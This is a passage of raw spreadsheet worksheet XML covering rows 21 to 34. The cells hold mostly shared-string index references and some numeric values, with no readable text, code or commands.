      </c>
      <c r="AB21" s="49" t="s">
        <v>10</v>
      </c>
      <c r="AC21" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD21" s="65" t="s">
        <v>226</v>
      </c>
      <c r="AE21" s="65" t="s">
        <v>227</v>
      </c>
      <c r="AF21" s="53" t="s">
        <v>228</v>
      </c>
      <c r="AG21" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH21" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI21" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ21" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK21" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL21" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="22" ht="153.75" customHeight="1">
      <c r="B22" s="67" t="s">
        <v>171</v>
      </c>
      <c r="C22" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D22" s="45" t="s">
        <v>229</v>
      </c>
      <c r="E22" s="45" t="s">
        <v>230</v>
      </c>
      <c r="F22" s="45" t="s">
        <v>231</v>
      </c>
      <c r="G22" s="45" t="s">
        <v>232</v>
      </c>
      <c r="H22" s="46" t="s">
        <v>233</v>
      </c>
      <c r="I22" s="46" t="s">
        <v>10</v>
      </c>
      <c r="J22" s="46" t="s">
        <v>234</v>
      </c>
      <c r="K22" s="47">
        <v>1.0</v>
      </c>
      <c r="L22" s="47">
        <v>0.0</v>
      </c>
      <c r="M22" s="48">
        <v>1292.46983</v>
      </c>
      <c r="N22" s="48">
        <v>2.0</v>
      </c>
      <c r="O22" s="48">
        <v>3.0</v>
      </c>
      <c r="P22" s="49"/>
      <c r="Q22" s="50">
        <v>1292.46983</v>
      </c>
      <c r="R22" s="50">
        <v>2.0</v>
      </c>
      <c r="S22" s="50">
        <v>3.0</v>
      </c>
      <c r="T22" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U22" s="51" t="s">
        <v>235</v>
      </c>
      <c r="V22" s="51">
        <v>3.0</v>
      </c>
      <c r="W22" s="51">
        <v>7.0</v>
      </c>
      <c r="X22" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y22" s="52" t="s">
        <v>236</v>
      </c>
      <c r="Z22" s="52">
        <v>6.0</v>
      </c>
      <c r="AA22" s="52">
        <v>63.0</v>
      </c>
      <c r="AB22" s="49" t="s">
        <v>10</v>
      </c>
      <c r="AC22" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD22" s="68" t="s">
        <v>237</v>
      </c>
      <c r="AE22" s="69" t="s">
        <v>10</v>
      </c>
      <c r="AF22" s="53" t="s">
        <v>170</v>
      </c>
      <c r="AG22" s="46" t="s">
        <v>170</v>
      </c>
      <c r="AH22" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI22" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ22" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK22" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL22" s="70" t="s">
        <v>59</v>
      </c>
    </row>
    <row r="23" ht="153.75" customHeight="1">
      <c r="B23" s="67" t="s">
        <v>171</v>
      </c>
      <c r="C23" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D23" s="45" t="s">
        <v>229</v>
      </c>
      <c r="E23" s="45" t="s">
        <v>230</v>
      </c>
      <c r="F23" s="45" t="s">
        <v>98</v>
      </c>
      <c r="G23" s="45" t="s">
        <v>238</v>
      </c>
      <c r="H23" s="46" t="s">
        <v>239</v>
      </c>
      <c r="I23" s="46" t="s">
        <v>240</v>
      </c>
      <c r="J23" s="46" t="s">
        <v>241</v>
      </c>
      <c r="K23" s="47">
        <v>1.0</v>
      </c>
      <c r="L23" s="47">
        <v>0.0</v>
      </c>
      <c r="M23" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N23" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O23" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P23" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q23" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R23" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S23" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T23" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U23" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V23" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W23" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X23" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y23" s="52" t="s">
        <v>103</v>
      </c>
      <c r="Z23" s="52">
        <v>3.0</v>
      </c>
      <c r="AA23" s="52">
        <v>20.0</v>
      </c>
      <c r="AB23" s="49" t="s">
        <v>103</v>
      </c>
      <c r="AC23" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD23" s="68" t="s">
        <v>242</v>
      </c>
      <c r="AE23" s="69" t="s">
        <v>106</v>
      </c>
      <c r="AF23" s="53" t="s">
        <v>243</v>
      </c>
      <c r="AG23" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH23" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI23" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ23" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK23" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL23" s="70" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="24" ht="153.75" customHeight="1">
      <c r="B24" s="67" t="s">
        <v>171</v>
      </c>
      <c r="C24" s="45" t="s">
        <v>244</v>
      </c>
      <c r="D24" s="45" t="s">
        <v>245</v>
      </c>
      <c r="E24" s="45" t="s">
        <v>246</v>
      </c>
      <c r="F24" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G24" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H24" s="46" t="s">
        <v>247</v>
      </c>
      <c r="I24" s="46" t="s">
        <v>248</v>
      </c>
      <c r="J24" s="46" t="s">
        <v>249</v>
      </c>
      <c r="K24" s="47">
        <v>1.0</v>
      </c>
      <c r="L24" s="47">
        <v>0.0</v>
      </c>
      <c r="M24" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N24" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O24" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P24" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q24" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R24" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S24" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T24" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U24" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V24" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W24" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X24" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y24" s="52" t="s">
        <v>250</v>
      </c>
      <c r="Z24" s="52">
        <v>3.0</v>
      </c>
      <c r="AA24" s="52">
        <v>43.0</v>
      </c>
      <c r="AB24" s="49" t="s">
        <v>251</v>
      </c>
      <c r="AC24" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD24" s="65" t="s">
        <v>252</v>
      </c>
      <c r="AE24" s="65" t="s">
        <v>253</v>
      </c>
      <c r="AF24" s="53" t="s">
        <v>254</v>
      </c>
      <c r="AG24" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH24" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI24" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ24" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK24" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL24" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="25" ht="153.75" customHeight="1">
      <c r="B25" s="67" t="s">
        <v>171</v>
      </c>
      <c r="C25" s="45" t="s">
        <v>244</v>
      </c>
      <c r="D25" s="45" t="s">
        <v>245</v>
      </c>
      <c r="E25" s="45" t="s">
        <v>246</v>
      </c>
      <c r="F25" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G25" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H25" s="46" t="s">
        <v>255</v>
      </c>
      <c r="I25" s="46" t="s">
        <v>256</v>
      </c>
      <c r="J25" s="46" t="s">
        <v>257</v>
      </c>
      <c r="K25" s="47">
        <v>1.0</v>
      </c>
      <c r="L25" s="47">
        <v>0.0</v>
      </c>
      <c r="M25" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N25" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O25" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P25" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q25" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R25" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S25" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T25" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U25" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V25" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W25" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X25" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y25" s="52" t="s">
        <v>250</v>
      </c>
      <c r="Z25" s="52">
        <v>3.0</v>
      </c>
      <c r="AA25" s="52">
        <v>8.0</v>
      </c>
      <c r="AB25" s="49" t="s">
        <v>251</v>
      </c>
      <c r="AC25" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD25" s="65" t="s">
        <v>258</v>
      </c>
      <c r="AE25" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF25" s="53" t="s">
        <v>259</v>
      </c>
      <c r="AG25" s="65" t="s">
        <v>260</v>
      </c>
      <c r="AH25" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI25" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ25" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK25" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL25" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="26" ht="208.5" customHeight="1">
      <c r="B26" s="67" t="s">
        <v>171</v>
      </c>
      <c r="C26" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D26" s="45" t="s">
        <v>261</v>
      </c>
      <c r="E26" s="45" t="s">
        <v>262</v>
      </c>
      <c r="F26" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G26" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H26" s="46" t="s">
        <v>263</v>
      </c>
      <c r="I26" s="46" t="s">
        <v>264</v>
      </c>
      <c r="J26" s="46" t="s">
        <v>265</v>
      </c>
      <c r="K26" s="47">
        <v>1.0</v>
      </c>
      <c r="L26" s="47">
        <v>0.0</v>
      </c>
      <c r="M26" s="48">
        <v>1448.0</v>
      </c>
      <c r="N26" s="48">
        <v>1.0</v>
      </c>
      <c r="O26" s="48">
        <v>2.0</v>
      </c>
      <c r="P26" s="71" t="s">
        <v>10</v>
      </c>
      <c r="Q26" s="50" t="s">
        <v>266</v>
      </c>
      <c r="R26" s="50">
        <v>2.0</v>
      </c>
      <c r="S26" s="50">
        <v>4.0</v>
      </c>
      <c r="T26" s="71" t="s">
        <v>10</v>
      </c>
      <c r="U26" s="51" t="s">
        <v>267</v>
      </c>
      <c r="V26" s="51">
        <v>2.0</v>
      </c>
      <c r="W26" s="51">
        <v>4.0</v>
      </c>
      <c r="X26" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y26" s="52" t="s">
        <v>268</v>
      </c>
      <c r="Z26" s="52">
        <v>12.0</v>
      </c>
      <c r="AA26" s="52">
        <v>18.0</v>
      </c>
      <c r="AB26" s="49" t="s">
        <v>269</v>
      </c>
      <c r="AC26" s="64" t="s">
        <v>270</v>
      </c>
      <c r="AD26" s="65" t="s">
        <v>271</v>
      </c>
      <c r="AE26" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF26" s="53" t="s">
        <v>272</v>
      </c>
      <c r="AG26" s="65" t="s">
        <v>273</v>
      </c>
      <c r="AH26" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI26" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ26" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK26" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL26" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="27" ht="153.75" customHeight="1">
      <c r="B27" s="67" t="s">
        <v>172</v>
      </c>
      <c r="C27" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D27" s="45" t="s">
        <v>274</v>
      </c>
      <c r="E27" s="45" t="s">
        <v>275</v>
      </c>
      <c r="F27" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G27" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H27" s="46" t="s">
        <v>276</v>
      </c>
      <c r="I27" s="65" t="s">
        <v>277</v>
      </c>
      <c r="J27" s="46" t="s">
        <v>278</v>
      </c>
      <c r="K27" s="47">
        <v>1.0</v>
      </c>
      <c r="L27" s="47">
        <v>0.0</v>
      </c>
      <c r="M27" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N27" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O27" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P27" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q27" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R27" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S27" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T27" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U27" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V27" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W27" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X27" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y27" s="52" t="s">
        <v>279</v>
      </c>
      <c r="Z27" s="52">
        <v>4.0</v>
      </c>
      <c r="AA27" s="52">
        <v>12.0</v>
      </c>
      <c r="AB27" s="49" t="s">
        <v>280</v>
      </c>
      <c r="AC27" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD27" s="65" t="s">
        <v>281</v>
      </c>
      <c r="AE27" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF27" s="53" t="s">
        <v>282</v>
      </c>
      <c r="AG27" s="65" t="s">
        <v>283</v>
      </c>
      <c r="AH27" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI27" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ27" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK27" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL27" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="28" ht="153.75" customHeight="1">
      <c r="B28" s="44" t="s">
        <v>172</v>
      </c>
      <c r="C28" s="45" t="s">
        <v>284</v>
      </c>
      <c r="D28" s="45" t="s">
        <v>285</v>
      </c>
      <c r="E28" s="45" t="s">
        <v>286</v>
      </c>
      <c r="F28" s="45" t="s">
        <v>10</v>
      </c>
      <c r="G28" s="45" t="s">
        <v>10</v>
      </c>
      <c r="H28" s="46" t="s">
        <v>287</v>
      </c>
      <c r="I28" s="46" t="s">
        <v>288</v>
      </c>
      <c r="J28" s="46" t="s">
        <v>289</v>
      </c>
      <c r="K28" s="47">
        <v>1.0</v>
      </c>
      <c r="L28" s="47">
        <v>0.0</v>
      </c>
      <c r="M28" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N28" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O28" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P28" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q28" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R28" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S28" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T28" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U28" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V28" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W28" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X28" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y28" s="52" t="s">
        <v>191</v>
      </c>
      <c r="Z28" s="52">
        <v>2.0</v>
      </c>
      <c r="AA28" s="52">
        <v>5.0</v>
      </c>
      <c r="AB28" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC28" s="64" t="s">
        <v>212</v>
      </c>
      <c r="AD28" s="65" t="s">
        <v>290</v>
      </c>
      <c r="AE28" s="65" t="s">
        <v>291</v>
      </c>
      <c r="AF28" s="53" t="s">
        <v>292</v>
      </c>
      <c r="AG28" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH28" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI28" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ28" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK28" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL28" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="29" ht="153.75" customHeight="1">
      <c r="B29" s="44" t="s">
        <v>172</v>
      </c>
      <c r="C29" s="45" t="s">
        <v>284</v>
      </c>
      <c r="D29" s="45" t="s">
        <v>293</v>
      </c>
      <c r="E29" s="45" t="s">
        <v>294</v>
      </c>
      <c r="F29" s="45" t="s">
        <v>295</v>
      </c>
      <c r="G29" s="45" t="s">
        <v>296</v>
      </c>
      <c r="H29" s="46" t="s">
        <v>297</v>
      </c>
      <c r="I29" s="46" t="s">
        <v>298</v>
      </c>
      <c r="J29" s="46" t="s">
        <v>299</v>
      </c>
      <c r="K29" s="47">
        <v>1.0</v>
      </c>
      <c r="L29" s="47">
        <v>0.0</v>
      </c>
      <c r="M29" s="48">
        <v>1444.0</v>
      </c>
      <c r="N29" s="48">
        <v>1.0</v>
      </c>
      <c r="O29" s="48">
        <v>2.0</v>
      </c>
      <c r="P29" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q29" s="50" t="s">
        <v>300</v>
      </c>
      <c r="R29" s="50">
        <v>4.0</v>
      </c>
      <c r="S29" s="72">
        <v>98.0</v>
      </c>
      <c r="T29" s="73">
        <v>2008120.0</v>
      </c>
      <c r="U29" s="51" t="s">
        <v>300</v>
      </c>
      <c r="V29" s="51">
        <v>4.0</v>
      </c>
      <c r="W29" s="51">
        <v>98.0</v>
      </c>
      <c r="X29" s="49">
        <v>2008120.0</v>
      </c>
      <c r="Y29" s="52" t="s">
        <v>301</v>
      </c>
      <c r="Z29" s="52">
        <v>8.0</v>
      </c>
      <c r="AA29" s="52">
        <v>121.0</v>
      </c>
      <c r="AB29" s="49" t="s">
        <v>302</v>
      </c>
      <c r="AC29" s="64" t="s">
        <v>181</v>
      </c>
      <c r="AD29" s="68" t="s">
        <v>303</v>
      </c>
      <c r="AE29" s="65" t="s">
        <v>304</v>
      </c>
      <c r="AF29" s="53" t="s">
        <v>305</v>
      </c>
      <c r="AG29" s="46" t="s">
        <v>108</v>
      </c>
      <c r="AH29" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI29" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ29" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK29" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL29" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="30" ht="153.75" customHeight="1">
      <c r="B30" s="44" t="s">
        <v>172</v>
      </c>
      <c r="C30" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D30" s="45" t="s">
        <v>306</v>
      </c>
      <c r="E30" s="45" t="s">
        <v>307</v>
      </c>
      <c r="F30" s="45" t="s">
        <v>308</v>
      </c>
      <c r="G30" s="45" t="s">
        <v>309</v>
      </c>
      <c r="H30" s="46" t="s">
        <v>188</v>
      </c>
      <c r="I30" s="46" t="s">
        <v>310</v>
      </c>
      <c r="J30" s="46" t="s">
        <v>311</v>
      </c>
      <c r="K30" s="47">
        <v>1.0</v>
      </c>
      <c r="L30" s="47">
        <v>0.0</v>
      </c>
      <c r="M30" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N30" s="48">
        <v>0.0</v>
      </c>
      <c r="O30" s="48">
        <v>0.0</v>
      </c>
      <c r="P30" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q30" s="59" t="s">
        <v>312</v>
      </c>
      <c r="R30" s="50">
        <v>2.0</v>
      </c>
      <c r="S30" s="50">
        <v>2.0</v>
      </c>
      <c r="T30" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U30" s="51" t="s">
        <v>313</v>
      </c>
      <c r="V30" s="51">
        <v>5.0</v>
      </c>
      <c r="W30" s="51">
        <v>5.0</v>
      </c>
      <c r="X30" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y30" s="52" t="s">
        <v>314</v>
      </c>
      <c r="Z30" s="52">
        <v>8.0</v>
      </c>
      <c r="AA30" s="52">
        <v>15.0</v>
      </c>
      <c r="AB30" s="49" t="s">
        <v>315</v>
      </c>
      <c r="AC30" s="64" t="s">
        <v>181</v>
      </c>
      <c r="AD30" s="65" t="s">
        <v>316</v>
      </c>
      <c r="AE30" s="65" t="s">
        <v>317</v>
      </c>
      <c r="AF30" s="53" t="s">
        <v>318</v>
      </c>
      <c r="AG30" s="46" t="s">
        <v>319</v>
      </c>
      <c r="AH30" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI30" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ30" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK30" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL30" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="31" ht="153.75" customHeight="1">
      <c r="B31" s="44" t="s">
        <v>172</v>
      </c>
      <c r="C31" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D31" s="45" t="s">
        <v>306</v>
      </c>
      <c r="E31" s="45" t="s">
        <v>307</v>
      </c>
      <c r="F31" s="55" t="s">
        <v>320</v>
      </c>
      <c r="G31" s="45" t="s">
        <v>321</v>
      </c>
      <c r="H31" s="46" t="s">
        <v>322</v>
      </c>
      <c r="I31" s="46" t="s">
        <v>323</v>
      </c>
      <c r="J31" s="46" t="s">
        <v>324</v>
      </c>
      <c r="K31" s="47">
        <v>1.0</v>
      </c>
      <c r="L31" s="47">
        <v>0.0</v>
      </c>
      <c r="M31" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N31" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O31" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P31" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q31" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R31" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S31" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T31" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U31" s="51" t="s">
        <v>325</v>
      </c>
      <c r="V31" s="51">
        <v>3.0</v>
      </c>
      <c r="W31" s="51">
        <v>8.0</v>
      </c>
      <c r="X31" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y31" s="52" t="s">
        <v>326</v>
      </c>
      <c r="Z31" s="52">
        <v>6.0</v>
      </c>
      <c r="AA31" s="52">
        <v>13.0</v>
      </c>
      <c r="AB31" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC31" s="64" t="s">
        <v>59</v>
      </c>
      <c r="AD31" s="65" t="s">
        <v>327</v>
      </c>
      <c r="AE31" s="65" t="s">
        <v>328</v>
      </c>
      <c r="AF31" s="53" t="s">
        <v>329</v>
      </c>
      <c r="AG31" s="46" t="s">
        <v>75</v>
      </c>
      <c r="AH31" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI31" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AJ31" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK31" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL31" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="32" ht="153.75" customHeight="1">
      <c r="B32" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C32" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D32" s="45" t="s">
        <v>331</v>
      </c>
      <c r="E32" s="45" t="s">
        <v>332</v>
      </c>
      <c r="F32" s="45" t="s">
        <v>333</v>
      </c>
      <c r="G32" s="45" t="s">
        <v>334</v>
      </c>
      <c r="H32" s="46" t="s">
        <v>335</v>
      </c>
      <c r="I32" s="46" t="s">
        <v>125</v>
      </c>
      <c r="J32" s="46" t="s">
        <v>336</v>
      </c>
      <c r="K32" s="47">
        <v>1.0</v>
      </c>
      <c r="L32" s="47">
        <v>0.0</v>
      </c>
      <c r="M32" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N32" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O32" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P32" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q32" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R32" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S32" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T32" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U32" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V32" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W32" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X32" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y32" s="52" t="s">
        <v>82</v>
      </c>
      <c r="Z32" s="52">
        <v>2.0</v>
      </c>
      <c r="AA32" s="52">
        <v>2.0</v>
      </c>
      <c r="AB32" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC32" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD32" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AE32" s="65" t="s">
        <v>337</v>
      </c>
      <c r="AF32" s="53" t="s">
        <v>338</v>
      </c>
      <c r="AG32" s="46" t="s">
        <v>339</v>
      </c>
      <c r="AH32" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI32" s="47" t="s">
        <v>153</v>
      </c>
      <c r="AJ32" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK32" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL32" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="33" ht="153.75" customHeight="1">
      <c r="B33" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C33" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D33" s="45" t="s">
        <v>331</v>
      </c>
      <c r="E33" s="45" t="s">
        <v>332</v>
      </c>
      <c r="F33" s="45" t="s">
        <v>333</v>
      </c>
      <c r="G33" s="45" t="s">
        <v>334</v>
      </c>
      <c r="H33" s="46" t="s">
        <v>335</v>
      </c>
      <c r="I33" s="46" t="s">
        <v>340</v>
      </c>
      <c r="J33" s="46" t="s">
        <v>341</v>
      </c>
      <c r="K33" s="47">
        <v>1.0</v>
      </c>
      <c r="L33" s="47">
        <v>0.0</v>
      </c>
      <c r="M33" s="48" t="s">
        <v>10</v>
      </c>
      <c r="N33" s="48" t="s">
        <v>10</v>
      </c>
      <c r="O33" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P33" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q33" s="50" t="s">
        <v>10</v>
      </c>
      <c r="R33" s="50" t="s">
        <v>10</v>
      </c>
      <c r="S33" s="50" t="s">
        <v>10</v>
      </c>
      <c r="T33" s="49" t="s">
        <v>10</v>
      </c>
      <c r="U33" s="51" t="s">
        <v>10</v>
      </c>
      <c r="V33" s="51" t="s">
        <v>10</v>
      </c>
      <c r="W33" s="51" t="s">
        <v>10</v>
      </c>
      <c r="X33" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Y33" s="52" t="s">
        <v>342</v>
      </c>
      <c r="Z33" s="52">
        <v>2.0</v>
      </c>
      <c r="AA33" s="52">
        <v>2.0</v>
      </c>
      <c r="AB33" s="49" t="s">
        <v>82</v>
      </c>
      <c r="AC33" s="64" t="s">
        <v>64</v>
      </c>
      <c r="AD33" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AE33" s="65" t="s">
        <v>10</v>
      </c>
      <c r="AF33" s="53" t="s">
        <v>170</v>
      </c>
      <c r="AG33" s="46" t="s">
        <v>170</v>
      </c>
      <c r="AH33" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AI33" s="47" t="s">
        <v>153</v>
      </c>
      <c r="AJ33" s="47" t="s">
        <v>64</v>
      </c>
      <c r="AK33" s="47" t="s">
        <v>59</v>
      </c>
      <c r="AL33" s="66" t="s">
        <v>64</v>
      </c>
    </row>
    <row r="34" ht="153.75" customHeight="1">
      <c r="B34" s="44" t="s">
        <v>330</v>
      </c>
      <c r="C34" s="45" t="s">
        <v>10</v>
      </c>
      <c r="D34" s="45" t="s">
        <v>331</v>
      </c>
      <c r="E34" s="45" t="s">
        <v>332</v>
      </c>
      <c r="F34" s="45" t="s">
        <v>333</v>
      </c>
      <c r="G34" s="45" t="s">
        <v>334</v>
      </c>
      <c r="H34" s="46" t="s">
        <v>335</v>
      </c>
      <c r="I34" s="46" t="s">
        <v>343</v>
      </c>
      <c r="J34" s="46" t="s">
        <v>344</v>
      </c>
      <c r="K34" s="47">
        <v>1.0</v>
      </c>
      <c r="L34" s="47">
        <v>0.0</v>
      </c>
      <c r="M34" s="48">
        <v>650.0</v>
      </c>
      <c r="N34" s="48">
        <v>1.0</v>
      </c>
      <c r="O34" s="48" t="s">
        <v>10</v>
      </c>
      <c r="P34" s="49" t="s">
        <v>10</v>
      </c>
      <c r="Q34" s="50" t="s">
        <v>345</v>
      </c>
